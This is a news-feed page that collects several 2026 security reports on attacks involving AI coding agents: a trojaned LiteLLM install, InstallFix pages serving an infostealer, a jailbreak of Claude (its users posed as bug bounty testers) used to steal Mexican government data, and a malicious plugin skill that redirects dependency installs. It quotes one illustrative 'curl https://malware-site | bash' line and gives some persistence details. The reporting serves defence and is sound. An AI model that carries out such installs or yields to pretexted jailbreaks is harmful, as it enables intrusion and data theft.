Visualização normal

Antes de ontemStream principal
  • ✇The Security Ledger
  • How Claude Planted Malicious Code In A Crypto-Trading App Paul Roberts
    A malicious campaign by North Korean state actors saw a malicious npm package dependency slipped into a crypto trading agent by an AI coding agent, according to a new report by ReversingLabs. The incident highlights a troubling new frontier in software supply chain attacks: hackers targeting developers...and the AI tools writing their code. The post How Claude Planted Malicious Code In A Crypto-Trading App appeared first on The Security Ledger with Paul F. Roberts.
     

How Claude Planted Malicious Code In A Crypto-Trading App

28 de Abril de 2026, 10:57

A malicious campaign by North Korean state actors saw a malicious npm package dependency slipped into a crypto trading agent by an AI coding agent, according to a new report by ReversingLabs. The incident highlights a troubling new frontier in software supply chain attacks: hackers targeting developers...and the AI tools writing their code.

The post How Claude Planted Malicious Code In A Crypto-Trading App appeared first on The Security Ledger with Paul F. Roberts.

Hackers Use Hidden Website Instructions in New Attacks on AI Assistants

Cybersecurity researchers at Forcepoint uncover new indirect prompt injection attacks that use hidden website code to exploit AI assistants like GitHub Copilot.
  • ✇Security Affairs
  • SentinelOne autonomous detection blocks trojaned LiteLLM triggered by Claude Code Pierluigi Paganini
    SentinelOne AI stopped a LiteLLM supply chain attack in seconds, blocking malicious code automatically without human intervention. SentinelOne’s AI-based security detected and blocked a supply chain attack involving a compromised LiteLLM package. SentinelOne’s macOS agent detected and stopped a malicious process chain triggered by Claude Code after it unknowingly installed a compromised LiteLLM package. The AI identified suspicious hidden Python code execution via base64 decoding, and ki
     

SentinelOne autonomous detection blocks trojaned LiteLLM triggered by Claude Code

1 de Abril de 2026, 05:58

SentinelOne AI stopped a LiteLLM supply chain attack in seconds, blocking malicious code automatically without human intervention.

SentinelOne’s AI-based security detected and blocked a supply chain attack involving a compromised LiteLLM package.

SentinelOne’s macOS agent detected and stopped a malicious process chain triggered by Claude Code after it unknowingly installed a compromised LiteLLM package. The AI identified suspicious hidden Python code execution via base64 decoding, and killed the process within seconds across hundreds of events. The system traced the full process chain triggered by an AI agent and prevented data theft or further spread, showing the power of autonomous, behavior-based defense.

Attackers indirectly compromised LiteLLM by first breaching trusted tools like Trivy, stealing maintainer credentials to publish malicious versions. The campaign also hit other platforms, showing how open-source trust can be abused. In one case, an AI coding assistant unknowingly installed the infected package, highlighting a new risk: AI agents with full system access can spread attacks automatically.

“SentinelOne’s behavioral detection operates below the application layer. It does not matter whether a malicious package is installed by a human, a CI pipeline, or an AI agent.” reads the report published by SentinelOne. “The platform monitors process behavior via the Endpoint Security Framework, which is why this detection fired regardless of how the infected package arrived.”

Two malicious versions ensured execution, one during normal use, the other at Python startup, expanding the attack’s reach even to systems not actively using LiteLLM.

The LiteLLM attack began with a small, obfuscated script that launched silently, followed by a data stealer that collected system info, credentials, crypto wallets, and secrets. The malware then ensured persistence by installing a disguised system service that ran in the background and contacted its command server at long intervals to avoid detection.

“The third stage established persistence through a systemd user service at ~/.config/systemd/user/sysmon.service, executing a script at ~/.config/sysmon/sysmon.py.” continues the report. “The persistence mechanism included a 5-minute initial delay before any network activity, a technique specifically designed to outlast automated sandbox analysis. After that, the script contacted its C2 server every 50 minutes, fetching dynamic payload URLs.”

The attack expanded beyond the initial machine by creating privileged Kubernetes pods, gaining deep access to cluster nodes and deploying backdoors. Stolen data was encrypted and sent to a server designed to look legitimate, helping it bypass monitoring. Overall, the attack shows how modern threats combine stealth, automation, and multiple layers to move quickly and evade traditional defenses.

“The LiteLLM detection wasn’t a one-off. It’s what happens when autonomous, behavioral AI is built into the foundation, not bolted on after the fact.” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, LiteLLM supply)

  • ✇The Security Ledger
  • Exposed Developer Secrets Surge: AI Drives 34% Increase in 2025 Paul Roberts
    GitGuardian’s latest Secrets Sprawl report found more than 28 million new secrets exposed via public GitHub commits in 2025, a 34% increase over 2024 and the largest annual jump the company has recorded. The spike reflects a broader transformation in software creation, as AI tools lower the barrier to coding. The post Exposed Developer Secrets Surge: AI Drives 34% Increase in 2025 appeared first on The Security Ledger with Paul F. Roberts.
     

Exposed Developer Secrets Surge: AI Drives 34% Increase in 2025

17 de Março de 2026, 09:05

GitGuardian’s latest Secrets Sprawl report found more than 28 million new secrets exposed via public GitHub commits in 2025, a 34% increase over 2024 and the largest annual jump the company has recorded. The spike reflects a broader transformation in software creation, as AI tools lower the barrier to coding.

The post Exposed Developer Secrets Surge: AI Drives 34% Increase in 2025 appeared first on The Security Ledger with Paul F. Roberts.

  • ✇Malwarebytes
  • Fake Claude Code install pages hit Windows and Mac users with infostealers
    Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments.Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter.​ That habit turns the website into a remote control: whatever script lives at that URL runs with your permissions, often those of an administrator.Resea
     

Fake Claude Code install pages hit Windows and Mac users with infostealers

9 de Março de 2026, 10:07

Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments.

Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter.​ That habit turns the website into a remote control: whatever script lives at that URL runs with your permissions, often those of an administrator.

Researchers found that attackers abuse this workflow by keeping everything identical, only changing where that one‑liner actually connects to. For many non‑specialist users who just started using AI and developer tools, this method feels normal, so their guard is down.

But this basically boils down to “I trust this domain” and that’s not a good idea unless you know for sure that it can be trusted.

It usually plays out like this. Someone searches “Claude Code install” or “Claude Code CLI,” sees a sponsored result at the top with a plausible URL, and clicks without thinking too hard about it.

But that ad leads to a cloned documentation or download page: same logo, same sidebar, same text, and a familiar “copy” button next to the install command. In many cases, any other link you click on that fake page quietly redirects you to the real vendor site, so nothing else looks suspicious.

Similar to ClickFix attacks, this method is called InstallFix. The user runs the code that infects their own machine, under false pretenses, and the payload usually is an infostealer.

The main payload in these Claude Code-themed InstallFix cases is an infostealer called Amatera. It focuses on browser data like saved passwords, cookies, session tokens, autofill data, and general system information that helps attackers profile the device. With that, they can hijack web sessions and log into cloud dashboards and internal administrator panels without ever needing your actual password. Some reports also mention an interest in crypto wallets and other high‑value accounts.

Windows and Mac

The Claude Code-based campaign the researchers found was equipped to target both Windows and Mac users.

On macOS, the malicious one‑liner usually pulls a second‑stage script from an attacker‑controlled domain, often obfuscated with base64 to look noisy but harmless at first glance. That script then downloads and runs a binary from yet another domain, stripping attributes and making it executable before launching it. 

On Windows, the command has been seen spawning cmd.exe, which then calls mshta.exe with a remote URL. This allows the malware logic to run as a trusted Microsoft binary rather than an obvious random executable. In both cases, nothing spectacular appears on screen: you think you just installed a tool, while the real payload silently starts doing its work in the background.

How to stay safe

With ClickFix and InstallFix running rampant—and they don’t look like they’re going away anytime soon—it’s important to be aware, careful, and protected.

  • Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy-paste code. Analyze what the command will do, before you run it.
  • Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Limit the use of copy-paste for commands. Manually typing commands instead of copy-pasting can reduce the risk of unknowingly running malicious payloads hidden in copied text.
  • Secure your devices. Use an up-to-date, real-time anti-malware solution with a web protection component.
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

  • ✇Security Affairs
  • Claude code abused to steal 150GB in cyberattack on Mexican agencies Pierluigi Paganini
    Hackers abused Claude Code to build exploits and steal 150GB of data in a cyberattack targeting Mexican government systems. Hackers abused Anthropic’s Claude Code AI assistant to develop exploits, create custom tools, and automatically exfiltrate more than 150GB of data in an attack on Mexican government systems, the Israeli cybersecurity firm Gambit Security reports. The case highlights how generative AI can be weaponized to accelerate real-world cyber operations. Attackers compromised 1
     

Claude code abused to steal 150GB in cyberattack on Mexican agencies

1 de Março de 2026, 10:49

Hackers abused Claude Code to build exploits and steal 150GB of data in a cyberattack targeting Mexican government systems.

Hackers abused Anthropic’s Claude Code AI assistant to develop exploits, create custom tools, and automatically exfiltrate more than 150GB of data in an attack on Mexican government systems, the Israeli cybersecurity firm Gambit Security reports. The case highlights how generative AI can be weaponized to accelerate real-world cyber operations.

Attackers compromised 10 Mexican government agencies and a financial institution, starting with the tax authority in December 2025. Gambit Security found the threat actors sent over 1,000 prompts to Claude Code and used OpenAI’s GPT-4.1 to analyze stolen data.

Attackers jailbroke Anthropic’s Claude and used it for about a month to target multiple Mexican government entities, including the federal tax authority, the electoral institute, state governments, Mexico City’s civil registry, and Monterrey’s water utility. By bypassing AI guardrails and framing actions as authorized, the attacker automated exploit writing and data theft, exfiltrating 150GB of records and exposing about 195 million identities.

Posing as bug bounty testers, they crafted prompts to bypass safeguards. Claude initially resisted, flagging log deletion and stealth instructions as red flags before being manipulated into assisting the operation.

“In total, it produced thousands of detailed reports that included ready-to-execute plans, telling the human operator exactly which internal targets to attack next and what credentials to use,” Curtis Simpson, Gambit Security’s chief strategy officer. told VentureBeat.

When Claude stopped being helpful, the attackers switched to ChatGPT from OpenAI to get guidance on moving deeper into the network and organizing stolen credentials. As the breach progressed, they repeatedly asked where else government identities and related data could be found and which additional systems to target.

“This reality is changing all the game rules we have ever known,” said Alon Gromakov, co-founder and CEO of Gambit Security”

In November 2025, Anthropic disclosed that China-linked actors had also abused Claude Code in an espionage campaign targeting nearly 30 organizations worldwide. The AI was manipulated to perform key operational tasks.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Claude Code)

When Your AI Coding Plugin Starts Picking Your Dependencies: Marketplace Skills and Dependency Hijack in Claude Code

6 de Janeiro de 2026, 11:00

AI coding assistants are no longer just autocompleting lines of code, they are quietly making decisions for you. Tools like Claude Code are able to read projects, plan multi-step changes, install dependencies, and modify files with minimal human oversight. To make this possible, these assistants rely on plugin marketplaces, where third-party developers can enable ‘skills’ that teach the agent how to manage infrastructure, testing, and dependencies. Though powerful, the model requires a high degree of trust, thus bringing with it a new set of risks.

At a first glance, third-party marketplace plugins are harmless productivity boosters. Connect a marketplace and enable a plugin so your coding assistant becomes smarter about your stack. However, beneath the convenience is a security blind spot: These same skills often run with extremely high privilege and very little transparency on how they make decisions or where the code and dependencies are coming from. The code issue isn’t prompt manipulation or social engineering – it’s compromised automation.

A full technical blog post by SentinelOne’s own Prompt Security team breaks down how a single benign-looking plugin from an unofficial marketplace exposes a dependency management skill. When the developer asks the agent to install a common Python library, that skill quietly redirects the install to an attacker-controlled source, ensuring a trojanized version of the library is pulled into the project. While nothing looks wrong – the library imports cleanly, the example code runs without error – malicious code is now embedded into the environment, capable of exfiltrating secrets, monitoring traffic, or lying dormant until it is triggered at a later time.

What makes this especially concerning is persistence. Marketplace plugins are not one-off interactions. Once enabled, their skills remain available across sessions and will continue to shape how the agent behaves in the future. Rather than a ‘bad prompt’, this effect is more like compromising your package manager itself.

As AI-driven development workflows accelerate, plugin marketplaces and third-party skills are now part of the software supply chain whether teams realize it or not. If your coding assistant can fetch and execute code on your behalf, every plugin installed joins your trust boundary.

Read the full blog post here for a detailed walkthrough of the attack mechanics and learn why dependency skills are such a powerful, but under-modeled, risk.

Third-Party Trademark Disclaimer:

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.

❌
❌